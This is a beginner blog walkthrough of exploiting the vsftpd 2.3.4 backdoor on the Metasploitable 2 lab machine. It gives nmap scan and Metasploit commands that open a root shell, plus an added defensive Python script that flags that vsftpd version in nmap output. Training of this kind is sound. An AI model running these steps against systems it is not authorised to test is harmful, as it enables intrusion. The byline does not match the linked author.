Exploiting FTP in Metasploitable 2

ABDO HANY
3 min read · Jul 24, 2023


Metasploitable 2

Metasploitable 2 is a deliberately vulnerable Linux machine that is meant for beginners to practice their penetration testing skills. The challenges included in Metasploitable are straightforward but also provide you with the basics of hacking.

I’ve decided to start a Metasploitable series, where I write short and explanatory articles while exploiting vulnerabilities in the vulnerable machine. The short articles are meant to help beginners understand the concepts without taking in too much information in a short period of time.

Getting started

I’m going to assume that you have your attack machine (Kali Linux) and target (Metasploitable 2) set up in your hypervisor and ready to go. I am using VirtualBox.

The first thing that I did was to log in to the Metasploitable machine using the default credentials (msfadmin:msfadmin) and discover the IP address of the machine. I need this IP address to be able to scan the open ports on the Metasploitable machine. To get the IP:

ifconfig

Scanning

The next thing that I did was to scan the target machine from my attack machine. Scanning is the process of discovering the open ports on the target machine and the services running on those ports. This helps to narrow down the attack pattern against that machine. I used nmap for scanning:

nmap -sV -sS -p- -A 192.168.100.13

Let’s break the options down:

  • -sV: probe open ports to determine service and version information
  • -sS: TCP SYN scan (half-open; it does not complete the TCP handshake)
  • -p-: scan all ports
  • -A: enable OS detection, version detection, script scanning and traceroute

The image above shows the results from the scanning. After you do the scan, you’ll notice that the target machine has a considerable number of open ports, which means there are various attack vectors in this machine.

FTP, on port 21, is on top of the list from the scan results. It also shows the version being used, vsftpd 2.3.4. This gave me an idea on enumeration, and I went on to search if there are any known vulnerabilities on that version.

Exploitation

This version of vsftpd has a malicious backdoor in it that grants the attacker root access to the target machine. After reading about the exploit, I went and searched for it in the exploit database.

msfconsole
search vsftpd 2.3.4

The exploit is available in the database, so I can use the exploit to gain access into the target machine.

use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.100.13
exploit

After running the exploit, we get a shell inside the target machine. Running whoami shows that I am running as root, hence we have achieved our goal.

And that is how we do a simple FTP exploit on Metasploitable 2. I hope that was understandable and easy to follow.
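From the defender's side, the same nmap -sV output can be checked for this vsftpd version across many hosts at once. The following Python example is added here and is not part of the original article; the sample scan text, the second host and the function names parse_nmap and flagged_services are constructed for illustration.

```python
import re

# Service/version pairs to flag. Only the version named in this article is
# listed; extend the set from your own advisories (assumption: exact match).
FLAGGED = {("ftp", "vsftpd 2.3.4")}

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9a-fA-F.:]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

def parse_nmap(text):
    """Yield (host, port, proto, state, service, version) from nmap normal output."""
    host = None
    for line in text.splitlines():
        line = line.rstrip()
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and host:
            port, proto, state, service, version = m.groups()
            yield host, int(port), proto, state, service, (version or "").strip()

def flagged_services(text):
    """Return (host, port, version) for open services running a flagged version."""
    hits = []
    for host, port, proto, state, service, version in parse_nmap(text):
        if state != "open":
            continue
        for svc, bad in FLAGGED:
            # Match "vsftpd 2.3.4" but not "vsftpd 2.3.40".
            if service == svc and re.match(re.escape(bad) + r"(\s|$)", version):
                hits.append((host, port, version))
    return hits

# Constructed sample in the layout of nmap -sV normal output.
SAMPLE = """\
Nmap scan report for 192.168.100.13
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     vsftpd 2.3.4
22/tcp   open   ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
Nmap scan report for fileserver.lab (192.168.100.20)
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     vsftpd 3.0.3
2121/tcp closed ftp
"""

if __name__ == "__main__":
    for host, port, version in flagged_services(SAMPLE):
        print(f"{host}:{port} runs {version}: replace it with a trusted build")
```

Any host this reports should have vsftpd reinstalled from a verified package and be treated as potentially compromised until checked.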

More to come …

This article was originally published on Noob Learning, a blog about my journey in information security, learning through practical examples and hands-on walkthroughs. Sharing what I learn is important because at the end of the day, aren’t we all noobs in something?

https://tsitsiflora.medium.com/exploiting-ftp-in-metasploitable-2-8230a53be5ce
